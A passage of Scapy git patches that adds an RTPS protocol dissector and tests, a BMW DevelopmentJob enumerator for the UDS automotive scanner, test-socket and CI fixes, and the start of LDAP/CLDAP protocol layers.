encoding == PL_CDR_{LE,BE} then parameter list + ConditionalField( + EPacketField("parameterList", "", ParameterListPacket), + lambda pkt: pkt.encapsulationKind == 0x0003, + ), + # if writer entity id == 0x200c2: then participant message data + ConditionalField( + EPacketField( + "participantMessageData", "", ParticipantMessageDataPacket), + lambda pkt: pkt._pl_type == "ParticipantMessageData", + ), + # else (neither the cases) + ConditionalField( + SerializedDataField( + "serializedData", "", length_from=lambda pkt: pkt._pl_len + ), + lambda pkt: ( + pkt.encapsulationKind != 0x0003 \ + and pkt._pl_type != "ParticipantMessageData" + ), + ), + ] + + def __init__( + self, + *args, + writer_entity_id_key=None, + writer_entity_id_kind=None, + endianness=None, + pl_len=0, + **kwargs + ): + if writer_entity_id_key == 0x200 and writer_entity_id_kind == 0xC2: + DataPacket._pl_type = "ParticipantMessageData" + else: + DataPacket._pl_type = "SerializedData" + + DataPacket._pl_len = pl_len + + super().__init__(*args, endianness=endianness, **kwargs) + + +class RTPSSubMessage_DATA(EPacket): + """ + 0...2...........7...............15.............23...............31 + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | RTPS_DATA | flags | octetsToNextHeader | + +---------------+---------------+---------------+---------------+ + | Flags extraFlags | octetsToInlineQos | + +---------------+---------------+---------------+---------------+ + | EntityId readerEntityId | + +---------------+---------------+---------------+---------------+ + | EntityId writerEntityId | + +---------------+---------------+---------------+---------------+ + | | + + SequenceNumber writerSeqNum + + | | + +---------------+---------------+---------------+---------------+ + | | + ~ ParameterList inlineQos [only if Q==1] ~ + | | + +---------------+---------------+---------------+---------------+ + | | + ~ SerializedData serializedData [only if D==1 || K==1] ~ + | | + +---------------+---------------+---------------+---------------+ + """ + + name = "RTPS DATA (0x15)" + fields_desc = [ + XByteField("submessageId", 0x15), + XByteField("submessageFlags", 0x00), + EField(ShortField("octetsToNextHeader", 0)), + XNBytesField("extraFlags", 0x0000, 2), + EField(ShortField("octetsToInlineQoS", 0)), + X3BytesField("readerEntityIdKey", 0), + XByteField("readerEntityIdKind", 0), + X3BytesField("writerEntityIdKey", 0), + XByteField("writerEntityIdKind", 0), + # EnumField( + # "reader_id", + # default=b"\x00\x00\x00\x00", + # fmt="4s", + # enum=_rtps_reserved_entity_ids, + # ), + # EnumField( + # "writer_id", + # default=b"\x00\x00\x00\x00", + # fmt="4s", + # enum=_rtps_reserved_entity_ids, + # ), + EField(IntField("writerSeqNumHi", 0)), + EField(IntField("writerSeqNumLow", 0)), + # ------------------------------------- + ConditionalField( + InlineQoSPacketField("inlineQoS", "", InlineQoSPacket), + lambda pkt: pkt.submessageFlags & 0b00000010 == 0b00000010, + ), + ConditionalField( + DataPacketField("key", "", DataPacket), + lambda pkt: pkt.submessageFlags & 0b00001000 == 0b00001000, + ), + ConditionalField( + DataPacketField("data", "", DataPacket), + lambda pkt: pkt.submessageFlags & 0b00000100 == 0b00000100, + ), + ] + + +class RTPSSubMessage_INFO_TS(EPacket): + """ + 0...2...........7...............15.............23...............31 + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | INFO_TS | flags | octetsToNextHeader | + +---------------+---------------+---------------+---------------+ + | | + + Timestamp timestamp [only if T==1] + + | | + +---------------+---------------+---------------+---------------+ + """ + + name = "RTPS INFO_TS (0x09)" + fields_desc = [ + XByteField("submessageId", 0x09), + FlagsField( + "submessageFlags", 0, 8, + ["E", "I", "?", "?", "?", "?", "?", "?"]), + EField(ShortField("octetsToNextHeader", 0)), + ConditionalField( + Field("ts_seconds", default=0, fmt=" Optional[Packet_metaclass]: + + sm_id = struct.unpack("!b", remain[0:1])[0] + next_cls = _RTPSSubMessageTypes.get(sm_id, None) + + return next_cls + + +class RTPSMessage(Packet): + name = "RTPS Message" + fields_desc = [ + PacketListField("submessages", [], next_cls_cb=_next_cls_cb) + ] + + +bind_layers(RTPS, RTPSMessage, magic=b"RTPS") +bind_layers(RTPS, RTPSMessage, magic=b"RTPX") diff --git a/test/contrib/rtps/rtps.uts b/test/contrib/rtps/rtps.uts new file mode 100644 index 00000000000..9376c5b4f0b --- /dev/null +++ b/test/contrib/rtps/rtps.uts @@ -0,0 +1,165 @@ +% Real-Time Publish-Subscribe Protocol (RTPS) dissection +% +% Copyright (C) 2021 Trend Micro Incorporated +% Copyright (C) 2021 Alias Robotics S.L. +% +% This program is free software; you can redistribute it and/or modify it under +% the terms of the GNU General Public License as published by the Free Software +% Foundation; either version 2 of the License, or (at your option) any later +% version. +% +% This program is distributed in the hope that it will be useful, but WITHOUT ANY +% WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A +% PARTICULAR PURPOSE. See the GNU General Public License for more details. +% +% You should have received a copy of the GNU General Public License along with +% this program; if not, write to the Free Software Foundation, Inc., 51 Franklin +% Street, Fifth Floor, Boston, MA 02110-1301, USA. + +% RTPS layer test campaign + ++ Syntax check += Import the RTPS layer +from scapy.contrib.rtps import * +pkt = b"\x52\x54\x50\x53\x02\x01\x01\x10\x57\x63\x10\x01\xd6\xab\x40\x7f" \ + b"\x5b\xd9\xbb\x1c\x0e\x01\x0c\x00\x88\x2a\x10\x01\x5d\x8c\x97\x40" \ + b"\x78\xb6\x2d\xc2\x09\x01\x08\x00\xf4\x50\x81\x60\x51\xdd\x5c\x1c" \ + b"\x15\x05\x10\x01\x00\x00\x10\x00\x00\x01\x00\xc7\x00\x01\x00\xc2" \ + b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x03\x00\x00\x15\x00\x04\x00" \ + b"\x02\x01\x00\x00\x16\x00\x04\x00\x01\x10\x00\x00\x02\x00\x08\x00" \ + b"\x0a\x00\x00\x00\x00\x00\x00\x00\x50\x00\x10\x00\x57\x63\x10\x01" \ + b"\xd6\xab\x40\x7f\x5b\xd9\xbb\x1c\x00\x00\x01\xc1\x58\x00\x04\x00" \ + b"\x3f\x0c\x00\x00\x0f\x00\x04\x00\x00\x00\x00\x00\x31\x00\x18\x00" \ + b"\x01\x00\x00\x00\xbd\xeb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + b"\x00\x00\x00\x00\xac\x11\x00\x02\x48\x00\x18\x00\x01\x00\x00\x00" \ + b"\xe9\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + b"\xef\xff\x00\x01\x32\x00\x18\x00\x01\x00\x00\x00\xbd\xeb\x00\x00" \ + b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x11\x00\x02" \ + b"\x33\x00\x18\x00\x01\x00\x00\x00\xe8\x1c\x00\x00\x00\x00\x00\x00" \ + b"\x00\x00\x00\x00\x00\x00\x00\x00\xef\xff\x00\x01\x07\x80\x38\x00" \ + b"\x00\x00\x00\x00\x2c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + b"\x00\x00\x00\x00\x1d\x00\x00\x00\x74\x65\x73\x74\x2e\x6c\x6f\x63" \ + b"\x61\x6c\x2f\x30\x2e\x38\x2e\x30\x2f\x4c\x69\x6e\x75\x78\x2f\x4c" \ + b"\x69\x6e\x75\x78\x00\x00\x00\x00\x19\x80\x04\x00\x00\x80\x06\x00" \ + b"\x01\x00\x00\x00" + ++ Test endianness += PID_BUILTIN_ENDPOINT_QOS endianness +assert(raw(PID_BUILTIN_ENDPOINT_QOS(parameterId=119, parameterLength=0, parameterData=b"")) == b'w\x00\x00\x00') + + ++ Test RTPS += RTPS default header values +pkt2 = RTPS()/RTPSMessage(submessages=[ + RTPSSubMessage_HEARTBEAT(), + RTPSSubMessage_INFO_TS(), + RTPSSubMessage_DATA(), +]) +assert(bytes(RTPS()) == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') + += RTPS header dissect +p = RTPS(pkt) +assert(p.magic == b'\x52\x54\x50\x53') +assert(p.protocolVersion.major == 2) +assert(p.protocolVersion.minor == 1) +assert(p.vendorId.vendor_id == b'\x01\x10') +assert(p.guidPrefix.hostId == 0x57631001) +assert(p.guidPrefix.appId == 0xd6ab407f) +assert(p.guidPrefix.instanceId == 0x5bd9bb1c) +assert(len(p.submessages) == 3) + += RTPS INFO_DST Submessage +assert(p.submessages[0].submessageId == 0x0E) +assert(p.submessages[0].submessageFlags == 0x1) +assert(p.submessages[0].octetsToNextHeader == 12) +assert(p.submessages[0].guidPrefix.hostId == 0x882a1001) +assert(p.submessages[0].guidPrefix.appId == 0x5d8c9740) +assert(p.submessages[0].guidPrefix.instanceId == 0x78b62dc2) + += RTPS INFO_TS Submessage +assert(p.submessages[1].submessageId == 0x09) +assert(p.submessages[1].submessageFlags == 'E') +assert(p.submessages[1].octetsToNextHeader == 8) +assert(p.submessages[1].ts_seconds == 1619087604) +assert(p.submessages[1].ts_fraction == 475848017) + += RTPS DATA Submessage +assert(p.submessages[2].submessageId == 0x15) +assert(p.submessages[2].submessageFlags == 0x05) +assert(p.submessages[2].octetsToNextHeader == 272) +assert(p.submessages[2].extraFlags == 0x00) +assert(p.submessages[2].octetsToInlineQoS == 16) +assert(p.submessages[2].readerEntityIdKey == 0x100) +assert(p.submessages[2].readerEntityIdKind == 0xc7) +assert(p.submessages[2].writerEntityIdKey == 0x100) +assert(p.submessages[2].writerEntityIdKind == 0xc2) +assert(p.submessages[2].writerSeqNumHi == 0) +assert(p.submessages[2].writerSeqNumLow == 1) +assert(isinstance(p.submessages[2].data, DataPacket)) + +assert(p.submessages[2].data.encapsulationKind == 0x3) +assert(p.submessages[2].data.encapsulationOptions == 0x0) +assert(len(p.submessages[2].data.parameterList.parameterValues) == 12) + +assert(p.submessages[2].data.parameterList.parameterValues[0].parameterId == 0x15) +assert(p.submessages[2].data.parameterList.parameterValues[0].parameterLength == 4) +assert(p.submessages[2].data.parameterList.parameterValues[0].protocolVersion.minor == 1) +assert(p.submessages[2].data.parameterList.parameterValues[0].protocolVersion.major == 2) +assert(p.submessages[2].data.parameterList.parameterValues[0].padding == b'\x00\x00') + +assert(p.submessages[2].data.parameterList.parameterValues[1].parameterId == 0x16) +assert(p.submessages[2].data.parameterList.parameterValues[1].parameterLength == 4) +assert(p.submessages[2].data.parameterList.parameterValues[1].vendorId.vendor_id == b'\x01\x10') +assert(p.submessages[2].data.parameterList.parameterValues[1].padding == b'\x00\x00') + +assert(p.submessages[2].data.parameterList.parameterValues[2].parameterId == 0x02) +assert(p.submessages[2].data.parameterList.parameterValues[2].parameterLength == 8) +assert(p.submessages[2].data.parameterList.parameterValues[2].parameterData == b'\x0a\x00\x00\x00\x00\x00\x00\x00') + +assert(p.submessages[2].data.parameterList.parameterValues[3].parameterId == 0x50) +assert(p.submessages[2].data.parameterList.parameterValues[3].parameterLength == 16) +assert(p.submessages[2].data.parameterList.parameterValues[3].parameterData == b'Wc\x10\x01\xd6\xab@\x7f[\xd9\xbb\x1c\x00\x00\x01\xc1') + +assert(p.submessages[2].data.parameterList.parameterValues[4].parameterId == 0x58) +assert(p.submessages[2].data.parameterList.parameterValues[4].parameterLength == 4) +assert(p.submessages[2].data.parameterList.parameterValues[4].parameterData == b'\x3f\x0c\x00\x00') + +assert(p.submessages[2].data.parameterList.parameterValues[5].parameterId == 0x0f) +assert(p.submessages[2].data.parameterList.parameterValues[5].parameterLength == 4) +assert(p.submessages[2].data.parameterList.parameterValues[5].parameterData == b'\x00\x00\x00\x00') + +assert(p.submessages[2].data.parameterList.parameterValues[6].parameterId == 0x31) +assert(p.submessages[2].data.parameterList.parameterValues[6].parameterLength == 24) +assert(p.submessages[2].data.parameterList.parameterValues[6].locator.locatorKind == 0x1000000) +assert(p.submessages[2].data.parameterList.parameterValues[6].locator.port == 60349) +assert(p.submessages[2].data.parameterList.parameterValues[6].locator.address == '172.17.0.2') + +assert(p.submessages[2].data.parameterList.parameterValues[7].parameterId == 0x48) +assert(p.submessages[2].data.parameterList.parameterValues[7].parameterLength == 24) +assert(p.submessages[2].data.parameterList.parameterValues[7].locator.locatorKind == 0x1000000) +assert(p.submessages[2].data.parameterList.parameterValues[7].locator.port == 7401) +assert(p.submessages[2].data.parameterList.parameterValues[7].locator.address == '239.255.0.1') + +assert(p.submessages[2].data.parameterList.parameterValues[8].parameterId == 0x32) +assert(p.submessages[2].data.parameterList.parameterValues[8].parameterLength == 24) +assert(p.submessages[2].data.parameterList.parameterValues[8].locator.locatorKind == 0x1000000) +assert(p.submessages[2].data.parameterList.parameterValues[8].locator.port == 60349) +assert(p.submessages[2].data.parameterList.parameterValues[8].locator.address == '172.17.0.2') + +assert(p.submessages[2].data.parameterList.parameterValues[9].parameterId == 0x33) +assert(p.submessages[2].data.parameterList.parameterValues[9].parameterLength == 24) +assert(p.submessages[2].data.parameterList.parameterValues[9].locator.locatorKind == 0x1000000) +assert(p.submessages[2].data.parameterList.parameterValues[9].locator.port == 7400) +assert(p.submessages[2].data.parameterList.parameterValues[9].locator.address == '239.255.0.1') + +assert(p.submessages[2].data.parameterList.parameterValues[10].parameterId == 0x8007) +assert(p.submessages[2].data.parameterList.parameterValues[10].parameterLength == 56) +assert(p.submessages[2].data.parameterList.parameterValues[10].parameterData == b'\x00\x00\x00\x00,\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1d\x00\x00\x00test.local/0.8.0/Linux/Linux\x00\x00\x00\x00') + +assert(p.submessages[2].data.parameterList.parameterValues[11].parameterId == 0x8019) +assert(p.submessages[2].data.parameterList.parameterValues[11].parameterLength == 4) +assert(p.submessages[2].data.parameterList.parameterValues[11].parameterData == b'\x00\x80\x06\x00') + +assert(p.submessages[2].data.parameterList.sentinel.parameterId == 0x1) +assert(p.submessages[2].data.parameterList.sentinel.parameterLength == 0) +assert(p.submessages[2].data.parameterList.sentinel.parameterData == b'') From ba95873ca931aaeb5fe68e67163e2e21cd077822 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 29 Nov 2021 14:34:51 +0100 Subject: [PATCH 0700/1632] Increase UTscapy timeout from 3 to 5 minutes This should hopefully fix the import timeout on MacOS --- scapy/tools/UTscapy.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 8a79ff8f369..2efad8c041b 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -524,7 +524,7 @@ def _run_test_timeout(test, get_interactive_session, verb=3, my_globals=None): from scapy.autorun import StopAutorunTimeout try: return get_interactive_session(test, - timeout=3 * 60, # 3 min + timeout=5 * 60, # 5 min verb=verb, my_globals=my_globals) except StopAutorunTimeout: From 5aa08cf8b469bcf64e963298085fa91c1f2974c0 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 29 Nov 2021 18:04:38 +0100 Subject: [PATCH 0701/1632] Add BMW DevJob Enumerator for UDS_Scanner (#3457) --- scapy/contrib/automotive/bmw/definitions.py | 4 +- scapy/contrib/automotive/bmw/enumerator.py | 30 +++++++++++++ .../automotive/scanner/uds_scanner.uts | 42 +++++++++++++++++++ test/testsocket.py | 11 ++++- 4 files changed, 83 insertions(+), 4 deletions(-) create mode 100644 scapy/contrib/automotive/bmw/enumerator.py diff --git a/scapy/contrib/automotive/bmw/definitions.py b/scapy/contrib/automotive/bmw/definitions.py index 19a0dce6c9a..f4934625a05 100644 --- a/scapy/contrib/automotive/bmw/definitions.py +++ b/scapy/contrib/automotive/bmw/definitions.py @@ -1883,7 +1883,7 @@ class WEBSERVER(Packet): UDS_RDBI.dataIdentifiers[0x4140] = "BodyComConfig" UDS_RDBI.dataIdentifiers[0x4ab4] = "Betriebsstundenzaehler" UDS_RDBI.dataIdentifiers[0x5fc2] = "WDBI_DME_ABGLEICH_PROG_REQ" -UDS_RDBI.dataIdentifiers[0xd114] = "Gesamtweg-Streckenzähler Offset" +UDS_RDBI.dataIdentifiers[0xd114] = "Gesamtweg-Streckenzaehler Offset" UDS_RDBI.dataIdentifiers[0xd387] = "STATUS_DIEBSTAHLSCHUTZ" UDS_RDBI.dataIdentifiers[0xdb9c] = "InitStatusEngineAngle" UDS_RDBI.dataIdentifiers[0xEFE9] = "WakeupRegistry" @@ -4832,7 +4832,7 @@ class WEBSERVER(Packet): UDS_RC.routineControlIdentifiers[0x0205] = "readSWEDevelopmentInfo" UDS_RC.routineControlIdentifiers[0x0206] = "checkProgrammingPower" UDS_RC.routineControlIdentifiers[0x0207] = "VCM_Generiere_SVT" -UDS_RC.routineControlIdentifiers[0x020b] = "Steuergerätetausch" +UDS_RC.routineControlIdentifiers[0x020b] = "Steuergeraetetausch" UDS_RC.routineControlIdentifiers[0x020c] = "KeyExchange" UDS_RC.routineControlIdentifiers[0x020d] = "FingerprintExchange" UDS_RC.routineControlIdentifiers[0x020e] = "InternalAuthentication" diff --git a/scapy/contrib/automotive/bmw/enumerator.py b/scapy/contrib/automotive/bmw/enumerator.py new file mode 100644 index 00000000000..b1287bfd3d6 --- /dev/null +++ b/scapy/contrib/automotive/bmw/enumerator.py @@ -0,0 +1,30 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = BMW specific enumerators +# scapy.contrib.status = loads + + +from scapy.packet import Packet +from scapy.compat import Any, Iterable +from scapy.contrib.automotive.scanner.enumerator import _AutomotiveTestCaseScanResult # noqa: E501 +from scapy.contrib.automotive.uds import UDS +from scapy.contrib.automotive.bmw.definitions import DEV_JOB +from scapy.contrib.automotive.uds_scan import UDS_Enumerator + + +class BMW_DevJobEnumerator(UDS_Enumerator): + _description = "Available DevelopmentJobs by Identifier " \ + "and negative response per state" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + scan_range = kwargs.pop("scan_range", range(0x10000)) + return (UDS() / DEV_JOB(identifier=x) for x in scan_range) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%04x: %s" % \ + (tup[1].identifier, tup[1].sprintf("%DEV_JOB.identifier%")) diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 6dc00afda91..1a864663ca6 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -885,6 +885,48 @@ ids = [t.req.blockSequenceCounter for t in tc.results_with_positive_response] assert 1 in ids assert 3 in ids += BMW_DevJobEnumerator + +load_contrib("automotive.bmw.definitions") +load_contrib("automotive.bmw.enumerator") + +resps = [EcuResponse(None, [UDS()/DEV_JOB_PR(identifier=0xff00)/Raw(b"asdfbeef1")]), + EcuResponse(None, [UDS()/DEV_JOB_PR(identifier=0xff02)/Raw(b"beef2")]), + EcuResponse(None, [UDS()/DEV_JOB_PR(identifier=0xff03)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/DEV_JOB_PR(identifier=0xffff)/Raw(b"beefff")]), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId="DevelopmentJob")])] + +es = [BMW_DevJobEnumerator] + +scanner = executeScannerInVirtualEnvironment(resps, es, BMW_DevJobEnumerator_kwargs={"scan_range": range(0xFF00, 0x10000)}) + +assert scanner.scan_completed +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 0x100 - 4 +assert len(tc.results_with_positive_response) == 4 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "ReadTransportMessageStatus" in result +assert "65282" in result +assert "65283" in result +assert "ReadMemory" in result +assert "subFunctionNotSupported received" in result +assert "PR: Supported" in result + +ids = [t.req.identifier for t in tc.results_with_positive_response] + +assert 0xff00 in ids +assert 0xff02 in ids +assert 0xff03 in ids +assert 0xffff in ids + + Cleanup = Delete testsockets diff --git a/test/testsocket.py b/test/testsocket.py index bf5d14eea5f..52bdc174230 100644 --- a/test/testsocket.py +++ b/test/testsocket.py @@ -44,6 +44,7 @@ def __exit__(self, exc_type, exc_value, traceback): def close(self): # type: () -> None + global open_test_sockets for s in self.paired_sockets: try: s.paired_sockets.remove(self) @@ -51,6 +52,10 @@ def close(self): pass self.closed = True super(TestSocket, self).close() + try: + open_test_sockets.remove(self) + except ValueError: + pass def pair(self, sock): # type: (TestSocket) -> None @@ -86,6 +91,10 @@ def select(sockets, remain=conf.recv_poll_rate): not s._closed] return cast(List[SuperSocket], select_objects(sock, remain)) + def __del__(self): + # type: () -> None + self.close() + class UnstableSocket(TestSocket): """ @@ -111,7 +120,5 @@ def cleanup_testsockets(): """ Helper function to remove TestSocket objects after a test """ - global open_test_sockets for sock in open_test_sockets: sock.close() - del sock From 90c255d255eb6c4ea074eecece654fc9b515ad3a Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 1 Dec 2021 09:57:09 +0100 Subject: [PATCH 0702/1632] Add required permission to CodeQL action --- .github/workflows/unittests.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 48a51c0c62f..1d0236a613a 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -119,6 +119,8 @@ jobs: analyze: name: CodeQL analysis runs-on: ubuntu-latest + permissions: + security-events: write steps: - name: Checkout repository uses: actions/checkout@v2 From 72ee3acb422247cd2c5c60562101d5b6a252f82b Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 20 Oct 2021 16:59:32 +0200 Subject: [PATCH 0703/1632] Add LDAP/CLDAP support --- scapy/asn1/ber.py | 15 +- scapy/asn1fields.py | 17 +- scapy/layers/ldap.py | 444 +++++++++++++++++++++++++++++++++++++ test/scapy/layers/ldap.uts | 117 ++++++++++ 4 files changed, 585 insertions(+), 8 deletions(-) create mode 100644 scapy/layers/ldap.py create mode 100644 test/scapy/layers/ldap.uts diff --git a/scapy/asn1/ber.py b/scapy/asn1/ber.py index 014815498b9..c214c93744c 100644 --- a/scapy/asn1/ber.py +++ b/scapy/asn1/ber.py @@ -9,6 +9,8 @@ Basic Encoding Rules (BER) for ASN.1 """ +# Good read: https://luca.ntop.org/Teaching/Appunti/asn1.html + from __future__ import absolute_import from scapy.error import warning from scapy.compat import chb, orb, bytes_encode @@ -223,12 +225,16 @@ def BER_tagging_dec(s, # type: bytes # We output the 'real_tag' if it is different from the (im|ex)plicit_tag. real_tag = None if len(s) > 0: - err_msg = "BER_tagging_dec: observed tag does not match expected tag" + err_msg = ( + "BER_tagging_dec: observed tag 0x%.02x does not " + "match expected tag 0x%.02x" + ) if implicit_tag is not None: ber_id, s = BER_id_dec(s) if ber_id != implicit_tag: - if not safe: - raise BER_Decoding_Error(err_msg, remaining=s) + if not safe and ber_id & 0x1f != implicit_tag & 0x1f: + raise BER_Decoding_Error(err_msg % (ber_id, implicit_tag), + remaining=s) else: real_tag = ber_id s = chb(hash(hidden_tag)) + s @@ -236,7 +242,8 @@ def BER_tagging_dec(s, # type: bytes ber_id, s = BER_id_dec(s) if ber_id != explicit_tag: if not safe: - raise BER_Decoding_Error(err_msg, remaining=s) + raise BER_Decoding_Error(err_msg % (ber_id, explicit_tag), + remaining=s) else: real_tag = ber_id l, s = BER_len_dec(s) diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index 0e58066afed..bbb311fcac9 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -678,6 +678,8 @@ def __init__(self, name, default, *args, **kwargs): else: # should be ASN1F_field instance self.choices[p.network_tag] = p + if p.implicit_tag is not None: + self.choices[p.implicit_tag & 0x1f] = p self.pktchoices[hash(p.cls)] = (p.implicit_tag, p.explicit_tag) # noqa: E501 else: raise ASN1_Error("ASN1F_CHOICE: no tag found for one field") @@ -696,10 +698,17 @@ def m2i(self, pkt, s): if tag in self.choices: choice = self.choices[tag] else: - if self.flexible_tag: + if tag & 0x1f in self.choices: # Try resolve only the tag number + choice = self.choices[tag & 0x1f] + elif self.flexible_tag: choice = ASN1F_field else: - raise ASN1_Error("ASN1F_CHOICE: unexpected field") + raise ASN1_Error( + "ASN1F_CHOICE: unexpected field in '%s' " + "(tag %s not in possible tags %s)" % ( + self.name, tag, list(self.choices.keys()) + ) + ) if hasattr(choice, "ASN1_root"): choice = cast('ASN1_Packet', choice) # we don't want to import ASN1_Packet in this module... @@ -758,8 +767,8 @@ def __init__(self, name, None, context=context, implicit_tag=implicit_tag, explicit_tag=explicit_tag ) - if cls.ASN1_root.ASN1_tag == ASN1_Class_UNIVERSAL.SEQUENCE: - if implicit_tag is None and explicit_tag is None: + if implicit_tag is None and explicit_tag is None: + if cls.ASN1_root.ASN1_tag == ASN1_Class_UNIVERSAL.SEQUENCE: self.network_tag = 16 | 0x20 self.default = default diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py new file mode 100644 index 00000000000..b1bbe609f0f --- /dev/null +++ b/scapy/layers/ldap.py @@ -0,0 +1,444 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Gabriel Potter +# This program is published under a GPLv2 license + +""" +LDAP + +RFC 1777 - LDAP v2 +RFC 4511 - LDAP v3 +""" + +from scapy.asn1.asn1 import ASN1_STRING, ASN1_Class_UNIVERSAL, ASN1_Codecs +from scapy.asn1.ber import BERcodec_SEQUENCE +from scapy.asn1fields import ( + ASN1F_BOOLEAN, + ASN1F_CHOICE, + ASN1F_ENUMERATED, + ASN1F_INTEGER, + ASN1F_NULL, + ASN1F_PACKET, + ASN1F_SEQUENCE, + ASN1F_SEQUENCE_OF, + ASN1F_SET_OF, + ASN1F_STRING, + ASN1F_optional, +) +from scapy.asn1packet import ASN1_Packet +from scapy.packet import bind_bottom_up, bind_layers + +from scapy.layers.inet import TCP, UDP + +# Elements of protocol +# https://datatracker.ietf.org/doc/html/rfc1777#section-4 + +LDAPString = ASN1F_STRING +LDAPOID = ASN1F_STRING +LDAPDN = LDAPString +RelativeLDAPDN = LDAPString +AttributeType = LDAPString +AttributeValue = ASN1F_STRING +URI = LDAPString + + +class AttributeValueAssertion(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + AttributeType("attributeType", "organizationName"), + AttributeValue("attributeValue", "") + ) + + +class LDAPReferral(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = LDAPString("uri", "") + + +LDAPResult = ASN1F_SEQUENCE( + ASN1F_ENUMERATED("resultCode", 0, { + 0: "success", + 1: "operationsError", + 2: "protocolError", + 3: "timeLimitExceeded", + 4: "sizeLimitExceeded", + 5: "compareFalse", + 6: "compareTrue", + 7: "authMethodNotSupported", + 8: "strongAuthRequired", + 16: "noSuchAttribute", + 17: "undefinedAttributeType", + 18: "inappropriateMatching", + 19: "constraintViolation", + 20: "attributeOrValueExists", + 21: "invalidAttributeSyntax", + 32: "noSuchObject", + 33: "aliasProblem", + 34: "invalidDNSyntax", + 35: "isLeaf", + 36: "aliasDereferencingProblem", + 48: "inappropriateAuthentication", + 49: "invalidCredentials", + 50: "insufficientAccessRights", + 51: "busy", + 52: "unavailable", + 53: "unwillingToPerform", + 54: "loopDetect", + 64: "namingViolation", + 65: "objectClassViolation", + 66: "notAllowedOnNonLeaf", + 67: "notAllowedOnRDN", + 68: "entryAlreadyExists", + 69: "objectClassModsProhibited", + 70: "resultsTooLarge", # CLDAP + 80: "other", + }), + LDAPDN("matchedDN", ""), + LDAPString("diagnosticMessage", ""), + # LDAP v3 only + ASN1F_optional( + ASN1F_SEQUENCE_OF("referral", [], LDAPReferral, + implicit_tag=0xa3) + ) +) + +# Bind operation +# https://datatracker.ietf.org/doc/html/rfc1777#section-4.1 + + +class ASN1_Class_LDAP_Authentication(ASN1_Class_UNIVERSAL): + name = "LDAP Authentication" + simple = 0xa0 + krbv42LDAP = 0xa1 + krbv42DSA = 0xa2 + sasl = 0xa3 + + +class ASN1_LDAP_Authentication_simple(ASN1_STRING): + tag = ASN1_Class_LDAP_Authentication.simple + + +class BERcodec_LDAP_Authentication_simple(BERcodec_SEQUENCE): + tag = ASN1_Class_LDAP_Authentication.simple + + +class ASN1F_LDAP_Authentication_simple(ASN1F_STRING): + ASN1_tag = ASN1_Class_LDAP_Authentication.simple + + +class ASN1_LDAP_Authentication_krbv42LDAP(ASN1_STRING): + tag = ASN1_Class_LDAP_Authentication.krbv42LDAP + + +class BERcodec_LDAP_Authentication_krbv42LDAP(BERcodec_SEQUENCE): + tag = ASN1_Class_LDAP_Authentication.krbv42LDAP + + +class ASN1F_LDAP_Authentication_krbv42LDAP(ASN1F_STRING): + ASN1_tag = ASN1_Class_LDAP_Authentication.krbv42LDAP + + +class ASN1_LDAP_Authentication_krbv42DSA(ASN1_STRING): + tag = ASN1_Class_LDAP_Authentication.krbv42DSA + + +class BERcodec_LDAP_Authentication_krbv42DSA(BERcodec_SEQUENCE): + tag = ASN1_Class_LDAP_Authentication.krbv42DSA + + +class ASN1F_LDAP_Authentication_krbv42DSA(ASN1F_STRING): + ASN1_tag = ASN1_Class_LDAP_Authentication.krbv42DSA + + +class LDAP_SaslCredentials(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + LDAPString("mechanism", ""), + ASN1F_STRING("credentials", "") + ) + + +class LDAP_BindRequest(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_INTEGER("version", 2), + LDAPDN("bind_name", ""), + ASN1F_CHOICE("authentication", None, + ASN1F_LDAP_Authentication_simple, + 